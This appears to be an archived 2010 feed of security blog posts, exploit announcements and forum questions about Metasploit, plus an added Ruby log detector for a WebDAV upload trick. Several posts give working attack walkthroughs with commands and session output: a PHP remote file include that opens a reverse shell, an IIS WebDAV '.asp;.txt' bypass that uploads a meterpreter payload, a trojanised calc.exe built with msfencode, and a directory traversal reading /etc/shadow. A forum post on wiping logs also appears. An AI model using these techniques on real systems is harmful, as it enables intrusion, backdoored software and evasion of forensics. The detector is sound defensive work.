Black Hat DC 2010 Abstract: We've figured out how to defend wireless access points, but clients remain exposed. A look at new attacks against clients using old methods we'd all forgotten about and new methods leveraging Metasploit. This talk will include pre-owning clients before vpn authentication, new ways of using gifars, crossdomain.xml attacks and more.
-
-
21:04
»
SecDocs
Authors:
James Lee Tags:
Metasploit Event:
Black Hat DC 2010 Abstract: Sometimes you need to choose your exploits precisely and be careful about the packets you write to the wire. Sometimes you just want to type a command, go get some coffee, and come back to a pile of shells. This talk will cover the means that the Metasploit Framework provides for accomplishing both of these goals, including many advancements from my talk at Black Hat USA in the realm of client-side exploitation.
-
-
19:19
»
Carnal0wnage
Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.
Not too complicated to use: set your normal RHOST/RPORT options, set the PATH, and set your PHPURI with the vuln path, putting XXpathXX where you would normally put your php shell. So we take something like
Simple Text-File Login Remote File Include that has a vulnerable string of:
/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
and make your PHPURI
PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
let's see it in action
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...
Exploits
========
Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit
msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info
Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm
egypt
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Space: 32768
Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:
msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010
dir
0.jpeg header.inc.php license.txt slog_users.txt version.txt
1.jpeg index.asp old slogin.inc.php
adminlog.php install.txt readme.txt slogin_genpass.php
footer.inc.php launch.asp slog_users.php slogin_lib.inc.php
id uid=33(www-data) gid=33(www-data) groups=33(www-data)
-
-
10:01
»
Packet Storm Security Recent Files
This exploits a stack buffer overflow in the AgentX++ library, as used by various applications. By sending a specially crafted request, an attacker can execute arbitrary code, potentially with SYSTEM privileges. This Metasploit module was tested successfully against master.exe as included with Real Network's Helix Server v12. When installed as a service with Helix Server, the service runs as SYSTEM, has no recovery action, but will start automatically on boot. This Metasploit module does not work with NX/XD enabled but could be modified easily to do so. The address
-
-
7:20
»
Carnal0wnage
intro..webdav stuff...lazy...
To get yourself a test environment you can follow this tutorial, it's not bad. You'll want to make sure you pay attention to the part about allowing your IUSR_WHATEVER account to have write access, or you can set up a windows account to use authentication.
Metasploit has a few modules to test for WebDAV presence.
webdav_scanner:
msf auxiliary(webdav_scanner) > run
[*] 192.168.242.134 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
webdav_internal_ip
msf auxiliary(webdav_internal_ip) > run
[*] Found internal IP in WebDAV response (192.168.242.134) 192.168.242.134
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
webdav_website_content
msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/iisstart.htm
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/pagerror.gif
[*] Found file or directory in WebDAV response (192.168.242.134) http://domino/davaroo/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The important one there is the davaroo directory; if someone has shared out the root directory it will usually just look like this:
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
Or if you have the path wrong
msf auxiliary(webdav_test) > run
[*] 192.168.242.134/DAV/ has DAV DISABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
If we need to see what options are allowed, you can use the http options auxiliary module.
msf auxiliary(options) > run
[*] 192.168.242.134 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
to see if you can upload things quickly you can give DAVtest a try or Ryan Linn's webdav_test module.
msf auxiliary(webdav_test) > run
[*] 192.168.242.134/davaroo/ has DAV ENABLED
[*] Attempting to create /davaroo/WebDavTest_111vO5Ats7
[*] 192.168.242.134/davaroo/ is WRITEABLE
[*] Trying /davaroo/WebDavTest_111vO5Ats7/9RiwStjSE7bI4dv.html
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pd84WuxboP6ZvcN.jhtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/Lqy4HqgiNoqS9YQ.php
[*] Trying /davaroo/WebDavTest_111vO5Ats7/y2QL82GmZvFHv0U.txt
[*] Trying /davaroo/WebDavTest_111vO5Ats7/W2CNVzATLpt9XeU.cgi
[*] Trying /davaroo/WebDavTest_111vO5Ats7/acl1gOJlmSu5fXf.pl
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pKR4pLVcDpcPCnB.jsp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/KWj69GgzXIHrR0j.aspx
[*] Trying /davaroo/WebDavTest_111vO5Ats7/1ImlpmATPINV2Zj.asp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/OT0B3cOEFLgnIGB.shtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/yGSr7GVoEmjcQCf.cfm
[*] Attempting to cleanup /davaroo/WebDavTest_111vO5Ats7
[*] Uploadable files are: html,jhtml,php,txt,cgi,pl,jsp,aspx,cfm
[*] Executable files are: html,txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What you'll probably run into here is the INABILITY to upload executable content, or anything otherwise useful, to the box. In this case I can upload php, cgi, jsp and aspx files, but nothing on the server will execute any of that content.
If you try to upload an .asp file you'll get a 403 Forbidden, and if you try to COPY/MOVE a .txt to .asp you'll also get a Forbidden. :-(
Thankfully there is a "feature" of 2k3 that lets you upload evil.asp;.txt, and that bypasses the filter.
So we generate our evil .asp file using msfpayload and msfencode; you could also use any other ASP shell...
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.94 LPORT=443 R |
./msfencode -o tcp443meterp.asp
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
Upload it and rename it:
dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt
Uploading tcp443meterp.asp to `/davaroo/tcp443meterp.txt':
Progress: [=============================>] 100.0% of 314810 bytes succeeded.
dav:/davaroo/> copy tcp443meterp.txt tcp443meterp.asp;.txt
Copying `/davaroo/tcp443meterp.txt' to `/davaroo/tcp443meterp.asp%3b.txt': succeeded.
dav:/davaroo/> exit
Now you can browse to the page at ip/tcp443meterp.asp;.txt and get your shell:
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.94:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.6.94
[*] Meterpreter session 1 opened (192.168.6.94:443 -> 192.168.242.134:49306)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: 6
meterpreter > sysinfo
Computer: WebDAVRulez
OS : Windows .NET Server (Build 3790, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > run migrate -f notepad.exe
[*] Current server process: svchost.exe (1792)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 312
[*] New server process: notepad.exe (312)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
What I ran into was that the shell came back with a less than desirable privilege level (Network Service). You'll have to work the local angle to elevate, but at least you have a shell.
More info here:
http://blog.metasploit.com/2009/12/exploiting-microsoft-iis-with.html
Resources:
cadaver:
http://www.webdav.org/cadaver/
DAVtest:
http://security.sunera.com/2010/04/davtest-quickly-test-exploit-webdav.html
Ryan Linn's port of DAVtest to metasploit:
http://trac.happypacket.net/browser/msfmods/trunk/modules/auxiliary/scanner/http/webdav_test.rb
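From the defender's side, here is an added example (my code, not part of the original post) that flags the WebDAV write methods and the `.asp;.txt` extension trick shown above in IIS W3C extended log lines. The log excerpt is constructed, and the column order is taken from the #Fields: header the way IIS writes it.

```ruby
# Added example (my code, not from the original post): flag the WebDAV
# activity described above in IIS W3C extended log lines.

# Extensions IIS 6 hands to a script engine; the upload filter blocks them,
# but a name like "shell.asp;.txt" reads as ".txt" to the filter.
SCRIPT_EXTS = %w[asp aspx asa cer cdx].freeze

# WebDAV methods that create, rename or delete server content. Note that
# IIS does not log the Destination header of COPY/MOVE, so the renamed
# ".asp;.txt" file only shows up when it is later requested.
WRITE_METHODS = %w[PUT COPY MOVE MKCOL DELETE].freeze

# Constructed IIS 6 log excerpt (not real traffic); the #Fields: header
# gives the column order, as in real IIS logs.
SAMPLE_LOG = <<~LOG
  #Software: Microsoft Internet Information Services 6.0
  #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
  2010-04-05 12:00:01 192.168.242.134 GET /iisstart.htm - 80 - 192.168.6.94 200
  2010-04-05 12:00:05 192.168.242.134 PROPFIND /davaroo/ - 80 - 192.168.6.94 207
  2010-04-05 12:00:09 192.168.242.134 PUT /davaroo/tcp443meterp.txt - 80 - 192.168.6.94 201
  2010-04-05 12:00:12 192.168.242.134 COPY /davaroo/tcp443meterp.txt - 80 - 192.168.6.94 201
  2010-04-05 12:00:20 192.168.242.134 GET /davaroo/tcp443meterp.asp;.txt - 80 - 192.168.6.94 200
  2010-04-05 12:00:25 192.168.242.134 PUT /davaroo/evil.asp - 80 - 192.168.6.94 403
LOG

# Parse W3C extended log text into one Hash per request, keyed by field name.
def parse_w3c(text)
  fields = nil
  text.each_line.with_object([]) do |line, rows|
    line = line.strip
    next if line.empty?
    if line.start_with?('#Fields:')
      fields = line.sub('#Fields:', '').split
      next
    end
    next if line.start_with?('#') || fields.nil?   # other directives, or no header yet
    rows << fields.zip(line.split(' ', fields.size)).to_h
  end
end

# True when the request path hides a script extension behind a semicolon,
# e.g. /davaroo/tcp443meterp.asp;.txt
def semicolon_bypass?(uri_stem)
  uri_stem.to_s.downcase.match?(/\.(#{SCRIPT_EXTS.join('|')});/)
end

# Return one finding per suspicious request, in log order.
def detect(text)
  parse_w3c(text).filter_map do |row|
    reasons = []
    reasons << "WebDAV write method #{row['cs-method']}" if WRITE_METHODS.include?(row['cs-method'])
    reasons << 'semicolon extension bypass' if semicolon_bypass?(row['cs-uri-stem'])
    next if reasons.empty?
    { time: "#{row['date']} #{row['time']}", client: row['c-ip'], method: row['cs-method'],
      uri: row['cs-uri-stem'], status: row['sc-status'], reasons: reasons }
  end
end

if __FILE__ == $PROGRAM_NAME
  detect(SAMPLE_LOG).each do |f|
    puts "#{f[:time]} #{f[:client]} #{f[:method]} #{f[:uri]} -> #{f[:status]} (#{f[:reasons].join(', ')})"
  end
end
```

A 403 on a PUT of .asp followed by a 200 on an ".asp;" name from the same client is the sequence worth alerting on, since the filter did its job and was then sidestepped.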
Packet Storm Security Recent Files
This Metasploit module exploits a buffer overflow in Serenity AudioPlayer versions 3.2.3 and below. By creating a specially crafted m3u file, an attacker may be able to execute arbitrary code.
Packet Storm Security Exploits
This Metasploit module exploits a stack overflow in WM Downloader version 3.0.0.9. By creating a specially crafted .pls file, an attacker may be able to execute arbitrary code.
Carnal0wnage
@hdmoore released a new auxiliary module a few days ago that goes along with the NTP research he has been doing.
msf auxiliary(ntp_monlist) > set RHOSTS time.euro.apple.com
RHOSTS => time.euro.apple.com
msf auxiliary(ntp_monlist) > info
Name: NTP Monitor List Scanner
Version: 8432
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
hdm
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
CHOST no The local client address
RHOSTS time.euro.apple.com yes The target address range or CIDR identifier
RPORT 123 yes The target port
THREADS 1 yes The number of concurrent threads
Description:
Obtain the list of recent clients from an NTP server
msf auxiliary(ntp_monlist) >
And when you run the module, it looks a bit like this:
msf auxiliary(ntp_monlist) > run
[*] Sending probes to 17.72.255.11->17.72.255.11 (1 hosts)
[*] 17.72.255.11:123 86.138.33.93:56042 (17.72.255.11)
[*] 17.72.255.11:123 188.192.151.225:52210 (17.72.255.11)
[*] 17.72.255.11:123 81.167.222.18:36866 (17.72.255.11)
[*] 17.72.255.11:123 89.247.73.227:63929 (17.72.255.11)
[*] 17.72.255.11:123 80.39.165.55:123 (17.72.255.11)
[*] 17.72.255.11:123 82.19.218.58:123 (17.72.255.11)
[*] 17.72.255.11:123 82.123.121.154:123 (17.72.255.11)
[*] 17.72.255.11:123 90.207.190.29:123 (17.72.255.11)
[*] 17.72.255.11:123 193.52.24.125:38377 (17.72.255.11)
[*] 17.72.255.11:123 91.10.239.87:64361 (17.72.255.11)
--SNIP--
[*] 17.72.255.11:123 89.241.98.89:27213 (17.72.255.11)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ntp_monlist) >
Other neat shiz...
Sensepost put out a cool post talking about some of the other neat queries you can do using the ntp tools.
http://www.sensepost.com/blog/4552.html
Some quick research into NTP (from www.ntp.org) revealed that NTP servers allow you to perform a bunch of commands that are secondary to time keeping. You can easily play with these using the ntpdc client program, e.g. 'ntpdc target.ntp.server'. Some of these commands include:
- listpeers - List the peers (NTP servers) for the time server
- showpeer - Give time keeping info about a specific peer time server
- peers - List peers and some basic time keeping info
- sysstats - Info regarding the ntp daemon itself
$ ntpq -c readvar time.euro.apple.com
assID=0 status=0684 leap_none, sync_ntp, 8 events, event_peer/strat_chg,version="ntpd 4.2.2@1.1532-o Mon Sep 24
01:42:27 UTC 2007 (1)", processor="i386", system="Darwin/9.6.0", leap=00, stratum=2, precision=-20, rootdelay=0.682, rootdispersion=10.719, peer=8126,
refid=17.72.133.54, reftime=cf648929.538400d4 Mon, Apr 5 2010 12:07:05.326, poll=7, clock=cf648a97.2560d91c Mon, Apr 5 2010 12:13:11.146, state=4, offset=0.149, frequency=43.608, jitter=0.058, noise=0.041, stability=0.000, tai=0
$ ntpdc -c peers time.euro.apple.com
remote local st poll reach delay offset disp
=======================================================================
*time1.euro.appl 17.72.255.11 1 128 377 0.00069 0.000155 0.07887
=time2.euro.appl 17.72.255.11 1 128 377 0.00061 0.000177 0.08919
=17.254.0.49 17.72.255.11 1 128 377 0.14996 0.000237 0.06696
=TrueTime.asia.a 17.72.255.11 1 128 377 0.31990 -0.000027 0.04962
=A17-106-100-13. 17.72.255.11 2 128 0 0.17369 0.007904 3.99217
+time4.euro.appl 17.72.255.11 2 32 376 0.00015 -0.000151 0.04303
$ ntpdc -c listpeers time.euro.apple.com
client time1.euro.apple.com
client time2.euro.apple.com
client 17.254.0.49
client TrueTime.asia.apple.com
client A17-106-100-13.apple.com
sym_active time4.euro.apple.com
Of course, if you just want to do the monlist yourself you can:
$ ntpdc -c monlist time.euro.apple.com
remote address port local address count m ver code avgint lstint
===============================================================================
94.96.201.223.dynamic. 50951 17.72.255.12 5 3 4 0 0 0
static-86-51-114-108.m 316 17.72.255.12 25 3 4 0 0 0
207-38-154-68.c3-0.ave 40311 17.72.255.12 7 3 4 0 0 0
62-177-171-130.dsl.bbe 501 17.72.255.12 1 3 4 0 0 0
bb6a37ee.virtua.com.br 123 17.72.255.12 1 3 4 0 0 0
p4FC7545E.dip.t-dialin 123 17.72.255.12 1 3 4 0 0 0
--SNIP--
Still Interested?
http://www.ntp.org/documentation.html
remote-exploit & backtrack
Ok, upon testing Metasploit and not getting sessions when I should have been, I have concluded it may have something to do with Port forwarding not being enabled.
I know how to forward ports: type 192.168.xx.x into my browser, supply my login details, and then go to port forwarding and configure. However, my only uncertainty is that officially I have two different IPs between my primary OS machine and my VM machine when I switch onto BackTrack; for example my OS IP is 192.168.xx.xx and my BT IP is 10.0.2.xx. So when I type 192.168.xx.x into my primary OS browser and forward ports, will the changes apply when I boot my BackTrack also, or is a different process required for that? Hope you can provide some clarity.
remote-exploit & backtrack
Hey all ... I've been experimenting with backtrack and metasploit for the past few days now, and I've successfully managed to penetrate a Windows XP SP0 system using metasploit ... However, when I use the autopwn method in metasploit to scan an ubuntu 7.10 system, no sessions are automatically created, meaning no vulnerabilities were found .. Is this correct? Are there no exploits in backtrack/metasploit for linux based OSes .. ?
Also, is metasploit's autopwn function a good way of scanning a network for vulnerable systems ?
remote-exploit & backtrack
Hey guys, I'm trying to figure out how to ssh into a Metasploit reverse tcp handler running on my home machine. In case that's a little confusing, I have a machine on my home network with a Metasploit handler running. I can ssh into the box, but I'd like to be able to control that specific console. I don't know if this is possible or not and lots of searching hasn't gotten me anywhere, so here I am... Any help would be appreciated :)
remote-exploit & backtrack
Hi
To me, some metasploit auxiliary/modules for oracle such as oracle_login, dbms_export_extension don't work any more.
The warnings are things like an "OCI" error (ruby-oci8). Even though I've successfully installed it in a fresh Ubuntu ruby, I still can't run oracle modules.
As far as I know, BT4 already has ->
metasploit com/redmine/projects/framework/wiki/OracleUsage
Metasploit Framework - OracleUsage - Metasploit Redmine Interface
Any ideas?
remote-exploit & backtrack
Hello,
I am trying to use 'auxiliary/admin/oracle/login_brute' in metasploit 3.3 but I am getting the following error.
------
[-] Auxiliary failed: NameError uninitialized constant OCIError
[-] Call stack:
[-] /msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:434:in `load_missing_constant'
[-] /msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:80:in `const_missing_with_dependencies'
[-] /msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:92:in `const_missing'
[-] (eval):55:in `rescue in block in run'
[-] (eval):52:in `block in run'
[-] /usr/lib/ruby/1.9.1/csv.rb:1761:in `each'
[-] /usr/lib/ruby/1.9.1/csv.rb:1197:in `block in foreach'
[-] /usr/lib/ruby/1.9.1/csv.rb:1335:in `open'
[-] /usr/lib/ruby/1.9.1/csv.rb:1196:in `foreach'
[-] (eval):47:in `run'
[*] Auxiliary module execution completed
-----
I have tried the recommendation below for a Windows Server 2003 environment, but it gives the same problem. Please assist. Thanks.
[1] Install subversion client
CollabNetSubversion-client-1.6.9-1.win32.exe
[2] Install ruby
ruby186-27_rc2.exe
[3] Install ruby-oci8
wget ruby-oci8-1.0.7-mswin32.rb
ruby ruby-oci8-1.0.7-mswin32.rb
[4]
svn co metasploit.com/svn/framework3/trunk/ metasploit
cd metasploit
ruby msfconsole (I am not able to execute this command successfully)
remote-exploit & backtrack
Hi! I was wondering whether it is possible to use metasploit, netcat and other tools when connected to the internet with an internet key? Does anything change?
remote-exploit & backtrack
For the last few weeks I've been playing with metasploit ...
I've had fun hacking an old server using the old net_api overflow on XP SP2.
I just read the metasploit blog about the new adobe_libtiff exploit.
I used the payload
windows/meterpreter/reverse_tcp
(is this right?)
I have the PDF on the target machine, it works A-OK and connects back to my machine on xxx.xxx.xxx.3:1133. My question is ....
how do I go from a tcp connection to either a meterpreter session or vncinject using the command line in ruby?
I've tried:
connect xxx.xxx.xxx.4:1133 ... it connects but then does nothing?
^^^ do I need to run this as a bg session/job?
Any suggestions please
& please don't flame me
Carnal0wnage
Very cool update to metasploit today:
http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896
This update allows you to msfencode a msfpayload into an existing executable, and the new executable still functions like the original. So if you inject into calc.exe you get calc.exe and your backdoor.
Let's see the new msfencode options:
~/trunk$ ./msfencode -h
Usage: ./msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff'
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template
Let's make our new backdoored executable.
~/trunk$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
Get the backdoored exe on the other box and execute it. We have a functional calc.exe and our shell.

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.210.11
LHOST => 192.168.210.11
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.210.11:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)
Keep in mind that you'll still need to migrate away from the backdoored executable's process, because if the user closes the exe you lose your shell.
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > run migrate explorer.exe
[*] Current server process: calc_backdoor.exe (3360)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1592
[*] New server process: Explorer.EXE (1592)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getpid
Current pid: 1592
meterpreter >
remote-exploit & backtrack
hi,
MS10-002 ,ie_iepeers (Microsoft Internet Explorer iepeers.dll use-after-free exploit )
4xsecurityteam.blogspot(dot)com (home page)
4xunderground.blogspot(dot)com
vimeo(dot)com/user1010000
thk$
Packet Storm Security Recent Files
This Metasploit module exploits a stack overflow in the USER verb in Open & Compact FTPd version 1.2. The program will crash once the payload is sent, so bind shell payloads are not effective.
remote-exploit & backtrack
I've been playing around for the last few hours trying to get this working.
I've read many forum posts on different forums, but I still haven't got it working.
It doesn't help that all of the Fast-track websites are down, both "Secure State" and "The Pen Test".
I've done all sorts of weird stuff like create a user called "postgres", and I can't count how many ruby libraries I've installed.
Here's some of the guides I've followed:
Automate Your Pen Testing with Fast-Track and Linux - www.enterprisenetworkingplanet.com
The Bored IT Guy » How to install Fast-Track 4.0 on Ubuntu
[ubuntu] How to: metasploit with autopwn [Archive] - Ubuntu Forums
Here's the versions I'm working with:
Metasploit v3.3.4-dev
Fast-track v4.0
When I run Fast-track, it tests for dependencies and everything comes back OK except for
pymills. I searched the web for
pymills and it seems to have disappeared into a black hole, seems like the Russians came and kidnapped the developers.
If I do:
Code:
python fast-track.py -i
Enter 2 for Autopwn.
Enter the IP address.
Enter 2 for Reverse Binding.
Then it loads Metasploit but here's what I get, check out the errors in red:
Code:
msf > db_destroy pentest
dropdb: could not connect to database postgres: FATAL: Ident authentication failed for user "root"
msf > db_create pentest
createdb: could not connect to database postgres: FATAL: Ident authentication failed for user "postgres"
[-] Error while running command db_create: Failed to connect to the database: FATAL: Ident authentication failed for user "postgres"
Call stack:
/root/metasploit/lib/msf/ui/console/command_dispatcher/db.rb:1552:in `db_create_postgresql'
/root/metasploit/lib/msf/ui/console/command_dispatcher/db.rb:1078:in `send'
/root/metasploit/lib/msf/ui/console/command_dispatcher/db.rb:1078:in `cmd_db_create'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:239:in `send'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:239:in `run_command'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:201:in `run_single'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:195:in `each'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:195:in `run_single'
/root/metasploit/lib/rex/ui/text/shell.rb:144:in `run'
/root/metasploit/msfconsole:93
msf > db_nmap 192.168.1.111
[-] Unknown command: db_nmap.
msf > db_autopwn -p -t -e -r
[-] Unknown command: db_autopwn.
msf > sleep 5
msf > jobs -K
Stopping all jobs...
Anyone got any ideas?
remote-exploit & backtrack
Hello gentlemen, well, now I come with a video tutorial about exploiting a vulnerability found on port 445 of Windows 7. I already saw this bug in the forum, posted by Progresive Death; it is worth clarifying that he runs it from the source code, whereas I run it directly from metasploit, which is why I put this together. What we are going to do is get the famous blue screen on our victim machine. I hope you like the video, thanks.
Video
youtube.com/user/sOrtHacK#p/u/2/VwYJ60K16LI
remote-exploit & backtrack
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 Service Pack 1 - lang:Unknown
[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.
Exploit target:
Id Name
-- ----
0 Automatic Targeting
How can I manually select the version of it + language?
My 2nd question is how do I run the GUI of metasploit in windows?
Thanks.
Packet Storm Security Exploits
This Metasploit module exploits a stack overflow in the CWD verb in Easy~FTP Server. You must have valid credentials to trigger this vulnerability.
remote-exploit & backtrack
I read ecsployt's quick tutorial on metasploit and it intrigued me..
I got to the end and read a few comments on how good and helpful it was.
But I have to say I still don't have a clue what is going on. Can someone suggest some reading for someone like me (let's say a total vegetable)?
Thanks.:confused:
remote-exploit & backtrack
I know this might sound pretty noobish to some of you professionals, but what is the best way to determine what exploits will work on a victim machine? I know nmap is good for finding ports, but what is the method everyone uses to know which exploit to choose that will apply? I am running boxes with win xp sp2 and sp3 and my host with bt4 final.
remote-exploit & backtrack
hey guys,
So I've been working with metasploit on normal internal networks at home. Everything works great there. Now I've wanted to go to the next level and see how everything works on a domain. So I've set up a small server at home and a domain to log into. I have a client log onto the server. I connect to this client using meterpreter, etc etc. So till now everything was jolly. Now when I try to take over the root account or system of the computer that I've exploited, I can't migrate to the system. I think it has something to do with the fact that I'm logged onto the server and not the local account. Any idea on how to compromise the local account? Or even better the server that the computer is logged into?
I know it's a lot to read through, but I appreciate the help..
squib
Carnal0wnage
Since everyone else is releasing code to check for/exploit the vmware server/esx/esxi directory traversal vulnerability I pushed up my checker module to the metasploit trunk as an auxiliary scanner module.
If you want to just download a full guest host, check out:
GuestStealer -- http://www.fyrmassociates.com/tools/gueststealer-v1.1.pl
or the nmap script -- http://www.skullsecurity.org/blog/?p=436
I don't feel like re-implementing it, and I for sure don't want anything ever auto-downloading several gigabytes of information for me, so if you want that functionality write it or use the above tools. Gueststealer works great.
Vulnerability References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3733
http://www.vmware.com/security/advisories/VMSA-2009-0015.html
The module:
The module is simple enough. By default it checks for:
FILE /etc/vmware/hostd/vmInventory.xml
If it receives a 200 for the traversal string and file, it reports the host as vulnerable. If you want to see the contents of the file you can uncomment the following line in the code:
#print_status("Output Of Requested File:\n#{res.body}")
Reload the module, then change FILE to whatever you want (example: set FILE /etc/shadow).
Since VMware runs as root, you pretty much have access to anything on the file system.
remote-exploit & backtrack
[Video tutorial] Log deletion - Clearev
In this video I use a tool that metasploit provides us. This tool is fully automated: it looks for any kind of file saved with the log that one leaves when accessing the system, and some applications that we run without meaning to.
Video -----> hxxp://blip.tv/file/3185165
I hope you like it.
Regards
Packet Storm Security Exploits
This Metasploit module exploits a stack-based buffer overflow within HyleosChemView.ocx of Hyleos ChemView 1.9.5.1. By setting an overly long value to 'SaveAsMolFile()', an attacker can overrun a buffer and execute arbitrary code.
remote-exploit & backtrack
Hi,
Is it possible to use the autopwn function to check whether a host could be exploited, without actually exploiting it?
Or is there any other way to check a host against all exploits from metasploit without compromising the host?
Packet Storm Security Recent Files
This Metasploit module exploits a stack overflow in Novell iPrint Client 5.30. When passing an overly long string via the target-frame parameter to ienipp.ocx an attacker can execute arbitrary code. NOTE: The operation variable must be set to a valid command in order to reach this vulnerability.
remote-exploit & backtrack
Newbie to metasploit and other similar tools.
I have downloaded it on one machine and transferred it to another server for install.
Having installed it, it now says it has not been updated for 42 days. However, the server has no internet connectivity. Any advice on how I can update?
Thanks
Carnal0wnage
Shiny new hotness...
meterpreter > getuid
Server username: WINXPSP3\user **user is an admin; if not an admin you can only use -t 4, or -t 0, which will iterate through all options**
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
